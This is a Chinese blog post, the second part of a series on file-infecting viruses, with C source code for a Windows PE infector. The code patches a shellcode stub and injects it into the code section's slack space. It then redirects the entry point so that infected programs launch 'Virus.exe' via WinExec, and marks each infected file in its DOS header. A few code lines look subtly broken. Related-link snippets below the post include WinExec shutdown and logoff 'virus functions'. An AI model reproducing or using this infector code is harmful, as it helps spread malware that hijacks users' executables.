关于感染型病毒的那些事(二)

最新推荐文章于 2024-08-18 23:52:40 发布
最新推荐文章于 2024-08-18 23:52:40 发布
阅读量709 收藏
点赞数
分类专栏: 网络安全 文章标签: dos buffer windows system byte c

 从(一)中建立了初步的注入代码后,需要把用来占位的11223344H改为相应的地址,用一个函数来完成.

 

view plain copy to clipboard print ?
  1. //OEP是从PE头中得到的程序入口点,VEP是病毒注入的起始位置,ImageBase是文件基址  
  2. int BuildInjectCode(DWORD OEP, DWORD VEP, DWORD ImageBase)  
  3. {  
  4.     unsigned char *p = InjectCode;  
  5.     *(DWORD *)(p + 1)  = VEP + ImageBase + 0x2B;    //SEH处理程序地址  
  6.     *(DWORD *)(p + 15) = ImageBase + 0x53;          //病毒名,这里我写在了PE的DOS头中  
  7.     *(DWORD *)(p + 20) = aWinExec;                  //offset WinExec  
  8.     *(DWORD *)(p + 37) = OEP + ImageBase;           //原程序OEP地址  
  9.     *(DWORD *)(p + 43) = OEP + ImageBase;  
  10.       
  11.     return 0x3E;    //0x3E是InjectCode的长度  
  12. }  

 

    利用Windows搜索文件的特点,如果将病毒放在System32文件夹下,那么,WinExec路径参数只需传递病毒文件名即可(如Virus.exe).

    打开文件进行注入感染,过程是:CreateFile()->CreateFileMapping()->MapViewOfFile()->InjectHelper()->UnMapViewOfFile(),CloseHandle().关键代码在于InjectHelper,是注入感染的帮助函数.用MapViewOfFile得到文件的内存指针,然后将指针传递给InjectHelper(),详细代码如下:

 

view plain copy to clipboard print ?
  1. void InjectHelper(char *Buff)  
  2. {  
  3.     //检查感染标志  
  4.     if (*(Buff + 0x4e) == 0x49      //'I'注入感染  
  5.         || *(Buff + 0x4e) == 0x52   //'R'资源感染  
  6.         || *(Buff + 0x4e) == 0x56)  //'V'病毒主体文件  
  7.     {  
  8.         return;  
  9.     }  
  10.       
  11.     char *ptr = Buff, *Section;  
  12.     DWORD temp, OEP, VEP, ImageBase;  
  13.     int i, NumberOfSection, LengthOfInjectCode;  
  14.     if (*(WORD *)ptr != 0x5A4D) return;     //检查MZ标志  
  15.     ptr += *(WORD *)(ptr + 0x3c);           //指向e_lfanew  
  16.     if (*(WORD *)ptr != 0x4550) return;     //检查PE标志  
  17.     temp = *(WORD *)(ptr + 0x5c);           //指向SubSystem  
  18.     if (temp != 2 && temp != 3) return;     //检查子系统版本,GUI或CUI  
  19.     OEP = *(DWORD *)(ptr + 0x28);           //取得原OEP  
  20.     Section = ptr + 0x100;                  //指向VirtualSize  
  21.     NumberOfSection = *(WORD *)(ptr + 6);   //获取节数  
  22.     for(i = 0; i < NumberOfSection; i++) //判断OEP在哪个节当中  
  23.     {  
  24.         if(*(DWORD *)(Section + 4) <= OEP /  
  25.             && *(DWORD *)Section + *(DWORD *)(Section + 4))  
  26.             break;  
  27.         Section += 0x28;  
  28.     }  
  29.     if (i >= NumberOfSection - 1)  
  30.     {  
  31.         return;  
  32.     }  
  33.     temp = *((DWORD *)Section + 8);         //指向RawSize  
  34.     if (*(DWORD *)Section < temp) temp = *(DWORD *)Section;          //取VirtualSize和RawSize中小的值  
  35.     VEP = *(DWORD *)(Section + 4) + temp;                           //VirtualAddress+temp(其实就是代码的长度)  
  36.     ImageBase = *(DWORD *)(ptr + 0x34);  
  37.     LengthOfInjectCode = BuildInjectCode(OEP, VEP, ImageBase);  
  38.     if (*(DWORD *)(Section + 0x28 + 0xc) <=                         //利用原代码长度加注入代码长度  
  39.             temp + *(DWORD *)(Section + 0x0c) + LengthOfInjectCode) //看是否覆盖到下一个区块的区域  
  40.     {  
  41.         return;  
  42.     }  
  43.     MoveMemory(Buff + temp + *(DWORD *)(Section +0x0c), InjectCode, LengthOfInjectCode);  
  44.     *(DWORD *)(ptr + 0x28) = VEP;           //修改PE文件的EntryPoint为注入代码地址  
  45.   
  46.     //写入注入标示'I'和病毒名Virus.exe,位于DOS头  
  47.     *(Buff + 0x4e) = 0x49;  
  48.     *(Buff + 0x53) = 'V';  
  49.     *(Buff + 0x54) = 'i';  
  50.     *(Buff + 0x55) = 'r';  
  51.     *(Buff + 0x56) = 'u';  
  52.     *(Buff + 0x57) = 's';  
  53.     *(Buff + 0x58) = '.';  
  54.     *(Buff + 0x59) = 'e';  
  55.     *(Buff + 0x5a) = 'x';  
  56.     *(Buff + 0x5b) = 'e';  
  57.     *(Buff + 0x5c) = '/0';  
  58.   
  59.     return;  
  60. }  

 

    利用BYTE*指针(即char*指针)指向buffer来完成指针的移动操作比较容易理解,但是需要做大量的WORD和DWORD的转换,基本这样就完成了对一个文件的注入感染了.过程中没有引入PE文件头的各类结构,都是用指针定位,所以需要对PE结构有一定的理解.

    To be continue...

echoisland
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
[系统安全] 十七.Windows PE病毒概念、分类及感染方式详解
杨秀璋的专栏
02-01 9924
作者前文介绍了PE文件格式,熟悉各种PE编辑查看工具,针对目标EXE程序新增对话框等;这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了《软件安全》视频、安全网站和参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。
一个感染木马病毒分析(一)
Fly20141201. 的专栏
08-04 6669
一、 样本信息 样本名称:resvr.exe(病毒母体) 样本大小:70144 字节 病毒名称:Trojan.Win32.Crypmodadv.a 样本MD5:5E63F3294520B7C07EB4DA38A2BEA301 样本SHA1: B45BCE0FCE6A0C3BA88A1778FA66A576B7D50895 电脑中了该病毒的典的特
Hook And Inject 系列教程 7.12 update
04-06 2214
从现在开始,我将带你走进Hook 与 Inject的世界,我至少介绍5种不同的Hook方法和至少4种不同的Inject方法给你。还会用相应的例子来示范,其中我也许会附带发布一些我写的工具,当然示范代码都是用Delphi写,(我还不太会C(正要学,请各位老大多多关照),用ASM又比Delphi麻烦^_^),基本上所有的例子我会详细解释其工作思路。PS:非常欢迎大家和我讨论,我的QQ:86667342
Virus.Win32.Induc.a 感染病毒分析
RENYUAN
09-07 3961
 Virus.Win32.Induc.a 感染分析一、<span class="t_tag" onclick="function onclick(){tagshow(event)}">文件信息文件大小:163840字节加壳类:ASPack 2.12编写语言:Borland Delphi 6/7病毒感染病毒描述该<span class="t_tag"
关于感染病毒的那些(三)
markman101---神即是道 道法自然 如来
07-01 668
 前段时间,我在网上下载了一个3D游戏,想要玩的时候却被提示需要将IE的主页设置为特定的网址才能玩这个游戏.对于我这种有"系统洁癖"的人来说,最反感的就是这种要求,用Peid查了下,发现没有加壳,一路跟下来,发现这个程序也提供了一种病毒感染的思路,那就是资源感染,既将宿主程序作为病毒程序的一个资源保存,将附加了宿主程序资源的病毒程序覆盖原宿主程序,在打开病毒程序时,病毒发作同时将宿主程序释放出来,运行之.这个3D游戏的反汇编片段:/**************************************
那些治愈者会再一次感染新冠病毒吗?
读芯术的博客
05-24 1887
全文共2299字,预计学习时长8分钟圣约瑟夫健康中心,护士正在处理鼻腔采样拭子很多人都会有这样的担忧,新冠痊愈后会再度中招吗?4月24日,世界卫生组织在推特上对此问题表示关注,称“目前...
c语言运行显示病毒,常见C语言病毒
weixin_39862669的博客
05-19 1173
#include#include#include#include#includevoid copyfile(char *infile, char *outfile){FILE*in,*out;in =fopen(infile,"r");out =fopen(outfile,"w");while(!feof(in)){fputc(fgetc(in),out);}fclose(in);fclose(o...
C++基础病毒性函数汇总
cjz2005的博客
03-24 3976
总结了 几 个 比较常见的病毒函数。 温馨而又冰冷的提示: 严禁用于非法用途哦!!!! 前方高能,请做好心理准备。 <必备头文件:Windows.h> 1.电源类 这几个也没啥技术含量,但反复调用的杀伤力还是挺强的(开机瞬关)。 (1)注销 VOID Logoff(VOID) { WinExec("logoff.exe",SW_HIDE); } (2)关机 VOID Shutdo.........
通过C编程实现病毒的文件感染功能…
Confession 的技术频道
01-23 1708
编程学着不是让你领教它的枯燥无味的,是让你灵活的用它的,让人们凌驾于计算机的智慧之上,用它把你的生活变得更简单,让不完美的世界更完美,看到了很多人自己写程序表白,的确可以做出很多浪漫。     你还可以拿着它玩出各种花样,别说你能力不够,那只是你对自己懒于思考,懒于学习的借口,世上无难只怕有心人!奉上用C编程实现简易病毒感染功能,别人能用很高级很复杂方式做到的情,我同样能拿着最基层的方式做到
Rewind:立即的病毒感染对策
04-01
倒带立即的病毒感染对策想法打开武器化文档的用户通常会意识到该文档有问题。 在许多情况下,他们会注意到可疑活动或某些方面,例如命令行窗口会弹出一秒钟的时间单击“启用内容”后没有任何内容显示赎金记录出现在...
Python 写了个新冠状病毒疫情传播模拟程序
12-20
情是这样的,B 站 UP 主 @ele 实验室,写了一个简单的疫情传播仿真程序,告诉大家在家待着的重要性,视频相信大家都看过了,并且 UP 主也放出了源码。 因为是 Java 开发的,所以开始我并没有多加关注。后来看到有...
新冠疫情防控心得体会-关于新冠病毒防御的感想分享.pdf
02-27
描述中提到的“抗击疫情,不是一个人,一个行业的情,这是每个人的情”强调了疫情防控的全民参与性和重要性。标签“网络资源”提示这可能是一个在线分享的知识资料。 在内容部分,首先提到了教育工作者在疫情...
Linux系统服务器防病毒实战.docx
09-26
病毒制造者们无论使用什么武器,汇编或者 C,要感染 ELF 文件都是轻而易举的情。这方面的病毒有 Lindose。 2. 蠕虫(worm)病毒:1988 年 Morris 蠕虫爆发后,Eugene H. Spafford 为了区分蠕虫和病毒,给出了蠕虫的...
游走于内网之后——工控安全那些儿.pdf
08-08
伊朗核设施感染了震网(Stuxnet)病毒,严重威胁了核反应堆的安全运行。黑客还曾入侵美国伊利诺伊州城市供水系统的数据采集与监控系统,使供水水泵遭到破坏。 3. 工控安全之我见 工控安全的防护措施迫在眉睫,因为...
Spring学习笔记
最新发布
我这个代码你能看懂吗?
08-18 327
是 Lombok 提供的注解,它用于简化 Java 类的构建器模式。它允许你使用一个简洁的语法来创建带有可选参数和默认值的构建器。它用于将一个元素映射到多个元素的流中,并将其扁平化为单个流来处理。方法接受一个映射函数,该函数将输入流中的每个元素转换为一个流。它将每个子流中的元素提取并将其添加到输出流中。它消除了创建和维护单独的构建器类以及编写冗长的构建器代码的需要。该方法返回一个构建器对象,允许你设置类的属性。方法也用于将输入流中的元素映射到一个新的流。方法将每个元素映射到一个包含多个值的流。
SpringBoot件监听机制
我这个代码你能看懂吗?
08-18 1042
这种使用反射的方式来处理件监听,使得Spring能够实现动态的依赖注入、件匹配和方法调用,而这些操作在运行时进行,增强了框架的灵活性和扩展性。在Java中,CGlib是一个常用的类库,用于实现动态代理,尤其对于那些声明了接口(继承了某个接口或实现了某个接口)的类,因为Java语言不支持在运行时动态创建接口的实现类。这里的查找和匹配过程,从宏观上看,是Spring框架在进行的一种“增强”操作,实际上是在执行AOP的逻辑。的方法的类相匹配,那么Spring会调用该方法来处理件。),遵循了接口隔离原则。
Delphi 实现JSON序列化和反序列化的功能以及源码探究
longchanghua_enshi的专栏
08-18 864
Delphi 中处理JSON序列化和反序列化的两种方式,以及效率对比。
第18 章探讨 C++新标准.可变参数模板,模板和函数参数包,展开参数包
zhyjhacker的博客
08-18 897
第18 章探讨 C++新标准.可变参数模板,模板和函数参数包,展开参数包。
计算机病毒状态转换与控制权解析
3. 激活态病毒:这是病毒完全控制了系统的情况,病毒代码正在被执行,它能执行任何软件能做的情,包括感染其他程序、破坏系统或数据。激活态病毒的威胁最大,因为它们可以自由地执行其破坏性行为。 4. 失活态病毒...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值